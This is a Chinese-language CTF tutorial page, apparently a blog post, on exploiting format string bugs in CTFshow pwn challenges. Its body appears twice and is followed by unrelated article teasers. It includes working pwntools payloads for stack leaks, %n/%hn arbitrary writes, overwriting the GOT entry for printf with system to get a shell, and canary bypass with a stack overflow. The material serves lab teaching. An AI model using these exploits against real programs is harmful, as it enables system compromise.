1. 格式化字符串漏洞基础原理格式化字符串漏洞是CTF pwn题型中的经典考点它的本质是程序员错误地使用printf等格式化输出函数时将用户输入直接作为第一个参数格式化字符串传递。这种漏洞之所以危险是因为攻击者可以通过精心构造的输入实现内存任意读写。举个例子当程序中出现类似printf(user_input)这样的代码时如果我们在user_input中输入%x程序就会打印出栈上的数据。更危险的是%n格式化符它能把已输出的字符数写入指定地址。比如输入AAAA%4$n就会在第4个参数指向的位置写入数字4。我在实际调试中发现32位和64位程序在参数传递上有明显差异。32位程序所有参数都通过栈传递而64位程序前6个参数会优先使用寄存器rdi/rsi/rdx/rcx/r8/r9超出的部分才会使用栈。这个特性直接影响我们计算格式化字符串偏移的方式。2. 偏移计算与任意地址写入实战2.1 确定格式化字符串偏移要利用格式化字符串漏洞首先需要确定我们的输入在栈上的位置。我常用的方法是输入一串AAAA配合多个%ppayload bAAAA b%p.*10 io.sendline(payload)在输出结果中查找0x41414141AAAA的十六进制数一下它是第几个参数。比如在32位程序中如果出现在第7个%p的位置说明偏移是7。2.2 构造任意写payload找到偏移后就可以利用%n系列格式化符实现任意地址写入。这里有个实用技巧通过控制输出的字符数来精确控制写入的值。比如target_addr 0x0804B038 payload p32(target_addr) b%6c%7$n这个payload会将目标地址压入栈占4字节输出6个字符空格填充将总输出字符数4610写入第7个参数指向的地址在CTFshow pwn91中我就是用这个方法修改了daniu变量的值成功拿到shell。3. GOT表劫持技术详解3.1 GOT/PLT机制回顾动态链接的程序通过GOTGlobal Offset Table来实现函数地址的延迟绑定。当程序第一次调用某个库函数如printf时会先跳转到PLT表再通过GOT表完成地址解析。之后再次调用时就直接使用GOT表中存储的地址。关键点在于GOT表是可写的这就给了我们劫持函数调用的机会。比如把printf的GOT项改为system的PLT地址那么后续调用printf时实际执行的就是system。3.2 完整利用链构造以CTFshow pwn94为例完整攻击流程如下泄露libc基址通过格式化字符串泄露printf的真实地址printf_got elf.got[printf] payload p32(printf_got) b%6$s io.sendline(payload) printf_addr u32(io.recv(4))计算system地址根据libc版本计算偏移libc LibcSearcher(printf, printf_addr) system_addr printf_addr - libc.dump(printf) libc.dump(system)覆写GOT表使用任意写修改printfgotpayload fmtstr_payload(6, {printf_got: system_addr}) io.sendline(payload)触发shell下次调用printf时传入/bin/shio.sendline(/bin/sh\x00)4. 高级利用技巧与实战案例4.1 栈数据泄露技巧当flag直接存在于栈上时如pwn96可以通过大量%p来泄露栈数据。我开发了一个自动化脚本for i in range(6, 20): payload f%{i}$p.encode() io.sendline(payload) leak io.recvline().strip() if b6366 in leak: # cf的hex print(fFound flag at position {i}) break4.2 绕过栈保护机制pwn98题目演示了如何绕过Stack Canary先用格式化字符串泄露canary值栈溢出时保持canary值不变覆盖返回地址到后门函数关键payload构造canary int(io.recvline(), 16) payload bA*0x28 p32(canary) bB*12 p32(backdoor)4.3 64位环境下的特殊处理64位程序如pwn100的利用需要注意参数优先通过寄存器传递地址高位通常是0可以分两次写入先写低位再写高位使用%hn2字节写入代替%n可以减少输出量一个典型的64位payloadpayload f%{lower_two_bytes}c%10$hn.encode() payload payload.ljust(16, bA) p64(target_addr)在实际比赛中我建议先用%p泄露多个位置的值画出完整的栈布局图这对构造精准的payload非常有帮助。同时要注意不同libc版本带来的偏移差异最好准备多个版本的libc数据库。
CTFshow-pwn入门-格式化字符串漏洞实战:从任意读写到GOT覆写
发布时间:2026/6/2 16:00:46
1. 格式化字符串漏洞基础原理格式化字符串漏洞是CTF pwn题型中的经典考点它的本质是程序员错误地使用printf等格式化输出函数时将用户输入直接作为第一个参数格式化字符串传递。这种漏洞之所以危险是因为攻击者可以通过精心构造的输入实现内存任意读写。举个例子当程序中出现类似printf(user_input)这样的代码时如果我们在user_input中输入%x程序就会打印出栈上的数据。更危险的是%n格式化符它能把已输出的字符数写入指定地址。比如输入AAAA%4$n就会在第4个参数指向的位置写入数字4。我在实际调试中发现32位和64位程序在参数传递上有明显差异。32位程序所有参数都通过栈传递而64位程序前6个参数会优先使用寄存器rdi/rsi/rdx/rcx/r8/r9超出的部分才会使用栈。这个特性直接影响我们计算格式化字符串偏移的方式。2. 偏移计算与任意地址写入实战2.1 确定格式化字符串偏移要利用格式化字符串漏洞首先需要确定我们的输入在栈上的位置。我常用的方法是输入一串AAAA配合多个%ppayload bAAAA b%p.*10 io.sendline(payload)在输出结果中查找0x41414141AAAA的十六进制数一下它是第几个参数。比如在32位程序中如果出现在第7个%p的位置说明偏移是7。2.2 构造任意写payload找到偏移后就可以利用%n系列格式化符实现任意地址写入。这里有个实用技巧通过控制输出的字符数来精确控制写入的值。比如target_addr 0x0804B038 payload p32(target_addr) b%6c%7$n这个payload会将目标地址压入栈占4字节输出6个字符空格填充将总输出字符数4610写入第7个参数指向的地址在CTFshow pwn91中我就是用这个方法修改了daniu变量的值成功拿到shell。3. GOT表劫持技术详解3.1 GOT/PLT机制回顾动态链接的程序通过GOTGlobal Offset Table来实现函数地址的延迟绑定。当程序第一次调用某个库函数如printf时会先跳转到PLT表再通过GOT表完成地址解析。之后再次调用时就直接使用GOT表中存储的地址。关键点在于GOT表是可写的这就给了我们劫持函数调用的机会。比如把printf的GOT项改为system的PLT地址那么后续调用printf时实际执行的就是system。3.2 完整利用链构造以CTFshow pwn94为例完整攻击流程如下泄露libc基址通过格式化字符串泄露printf的真实地址printf_got elf.got[printf] payload p32(printf_got) b%6$s io.sendline(payload) printf_addr u32(io.recv(4))计算system地址根据libc版本计算偏移libc LibcSearcher(printf, printf_addr) system_addr printf_addr - libc.dump(printf) libc.dump(system)覆写GOT表使用任意写修改printfgotpayload fmtstr_payload(6, {printf_got: system_addr}) io.sendline(payload)触发shell下次调用printf时传入/bin/shio.sendline(/bin/sh\x00)4. 高级利用技巧与实战案例4.1 栈数据泄露技巧当flag直接存在于栈上时如pwn96可以通过大量%p来泄露栈数据。我开发了一个自动化脚本for i in range(6, 20): payload f%{i}$p.encode() io.sendline(payload) leak io.recvline().strip() if b6366 in leak: # cf的hex print(fFound flag at position {i}) break4.2 绕过栈保护机制pwn98题目演示了如何绕过Stack Canary先用格式化字符串泄露canary值栈溢出时保持canary值不变覆盖返回地址到后门函数关键payload构造canary int(io.recvline(), 16) payload bA*0x28 p32(canary) bB*12 p32(backdoor)4.3 64位环境下的特殊处理64位程序如pwn100的利用需要注意参数优先通过寄存器传递地址高位通常是0可以分两次写入先写低位再写高位使用%hn2字节写入代替%n可以减少输出量一个典型的64位payloadpayload f%{lower_two_bytes}c%10$hn.encode() payload payload.ljust(16, bA) p64(target_addr)在实际比赛中我建议先用%p泄露多个位置的值画出完整的栈布局图这对构造精准的payload非常有帮助。同时要注意不同libc版本带来的偏移差异最好准备多个版本的libc数据库。
相关文章
预售易货实操拆解:中小商家轻成本拓客,合规落地不踩坑
做实体小店、线上小铺的商家,平时难免遇到库存积压、现金流紧张的问题,想清货又不想亏本打折,想拓客又没多余预算投广告,折腾半天往往两头不讨好。最近不少同行在聊的预售易货,其实就是解决这些痛点的温和玩法…
Android10开机向导定制实战:从零修改wizard_script.xml到调试技巧
Android 10开机向导深度定制指南:从XML解析到高效调试 每次拿到新手机时,那个引导我们完成初始设置的界面就是开机向导。对于普通用户来说,这只是个简单的引导流程,但对于Android开发者和ROM定制爱好者而言,这背后隐藏…
开源PCB数据集大盘点:从缺陷检测到多场景应用
1. 开源PCB数据集全景概览 在电子制造业中,印刷电路板(PCB)的质量检测一直是关键环节。传统人工检测效率低下且容易漏检,而基于机器视觉的自动化检测方案正逐渐成为主流。要实现高精度的AI检测模型,优质的数据集是必不…
AI专著生成新趋势:借助AI工具,快速产出20万字高质量专著!
撰写学术专著是一项复杂的任务,作者必须在“内容深度”和“覆盖广度”之间找到一个恰当的平衡,这对许多研究者来说都是一个难以逾越的障碍。在深度方面,专著中的核心观点必须有丰富的学术基础,不仅要清楚阐释“是什么”࿰…
基于Raspberry Pi与传感器打造智能弹球机:物联网与数据库实战
1. 项目概述:从童年梦想到桌面上的智能弹球机小时候,谁没被游戏厅里那台闪着炫光、叮当作响的弹球机迷住过呢?那种用两个挡板(我们叫它“弹片”或“flippers”)与一颗钢珠搏斗的紧张感,是许多人的共同记忆。…
Ansaldo 211QS50003B电源触发板
Ansaldo 211QS50003B 电源触发板具备高功率承载能力、精准的触发控制及工业级防护特性,主要特点如下:中间(15条)专为安萨尔多直流调速器设计,负责系统供电与晶闸管触发额定工作电压覆盖380V-860V,适配不同功…
别白买双屏本!YogaBook 幽灵键盘不会用等于浪费一半功能
联想 YogaBook 9 作为热门双屏旗舰本,标志性的幽灵键盘是整机最具特色的黑科技交互功能。无需外接物理键盘,下屏即可投射虚拟键盘,兼顾轻薄便携与高效输入,办公码字、随手记录都很方便。但很多新机用户普遍遇到两大难题࿱…
Visual C++运行库终极解决方案:一站式自动化部署完全指南
Visual C运行库终极解决方案:一站式自动化部署完全指南 【免费下载链接】vcredist AIO Repack for latest Microsoft Visual C Redistributable Runtimes 项目地址: https://gitcode.com/gh_mirrors/vc/vcredist VisualCppRedist AIO项目为Windows系统管理员…
告别重复劳动:5个Pulover‘s Macro Creator高效自动化应用场景
告别重复劳动:5个Pulovers Macro Creator高效自动化应用场景 【免费下载链接】PuloversMacroCreator Automation Utility - Recorder & Script Generator 项目地址: https://gitcode.com/gh_mirrors/pu/PuloversMacroCreator 每天面对枯燥的重复性电脑操…
从 Prompt 到生产闭环:Spring AI Tool Calling 深度拆解与企业级落地
从 Prompt 到生产闭环:Spring AI Tool Calling 深度拆解与企业级落地 摘要 Tool Calling 是大模型系统从“会回答”走向“会执行”的关键能力。很多文章只停留在 @Tool 注解和 Hello World 级别示例,但一旦进入生产环境,问题很快从“怎么调用”升级为“怎么控延迟、怎么控风…
解耦安防碎片化:基于 Docker 与边缘计算的 AI 视频中台架构设计(支持 GB28181/RTSP 与源码交付)
在智能视频分析(IVA)与产业物联网(IoT)大行其道的今天,政企级安防项目的落地依然面临着严重的碎片化挑战。对于系统集成商和独立软件开发商(ISV)而言,传统的流媒体研发存在两大核心痛…
解耦品牌壁垒:基于 Docker 与边缘计算的高并发视频中台架构(支持 GB28181/RTSP 统一接入与源码交付)
在泛安防与产业物联网(IoT)工程落地中,系统集成商与技术团队往往深陷于底层流媒体对接的碎片化泥潭。一方面,前端摄像机、IPC、NVR 品牌林立(如海康、大华、宇视等),其 GB28181 国标协议的信令交…
Win10/Win11下Realtek 8188GU网卡驱动感叹号?别急着扔,试试这个手动安装的野路子
Realtek 8188GU网卡驱动故障深度修复指南:从原理到实战当设备管理器里那个顽固的黄色感叹号挥之不去,而你已经尝试了所有"标准操作"——Windows自动更新、第三方驱动工具、甚至重启大法——却依然无济于事时,是时候换个思路了。这篇…
AnolisOS 8.8安装源配置踩坑实录:从‘设置基础软件仓库时出错’到成功联网的保姆级指南
AnolisOS 8.8安装源配置实战指南:从诊断到解决方案的全流程解析当你在安装AnolisOS 8.8时遇到"设置基础软件仓库时出错"的提示,这通常意味着系统无法访问或识别安装源。这个问题看似简单,但背后可能涉及网络配置、镜像选择、启动参…
基于树莓派Pico的反应速度测试游戏:从GPIO编程到状态机实战
1. 项目概述与核心思路最近在整理工作室的电子元件,翻出来几个闲置的街机按钮和一块树莓派Pico,灵机一动,决定做个简单又有趣的反应速度测试游戏。这个项目非常适合想入门嵌入式开发的朋友,它不涉及复杂的传感器和通信协议&#x…
Zotero Duplicates Merger:5步彻底清理文献库重复条目
Zotero Duplicates Merger:5步彻底清理文献库重复条目 【免费下载链接】ZoteroDuplicatesMerger A zotero plugin to automatically merge duplicate items 项目地址: https://gitcode.com/gh_mirrors/zo/ZoteroDuplicatesMerger 还在为文献库中堆积如山的重…
利用随机有限集理论对蜂群的ILQR和MPC控制研究附Matlab代码
✅作者简介:热爱科研的Matlab仿真开发者,擅长数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。🍎 往期回顾关注个人主页:Matlab科研工作室🍊个人信条:格物致知,完整Matlab代码及仿真咨询…
为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因
更多请点击: https://intelliparadigm.com 第一章:为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因 Gemini邮件的客户转化效率(CTE)显著偏低,根本原因常被误判为…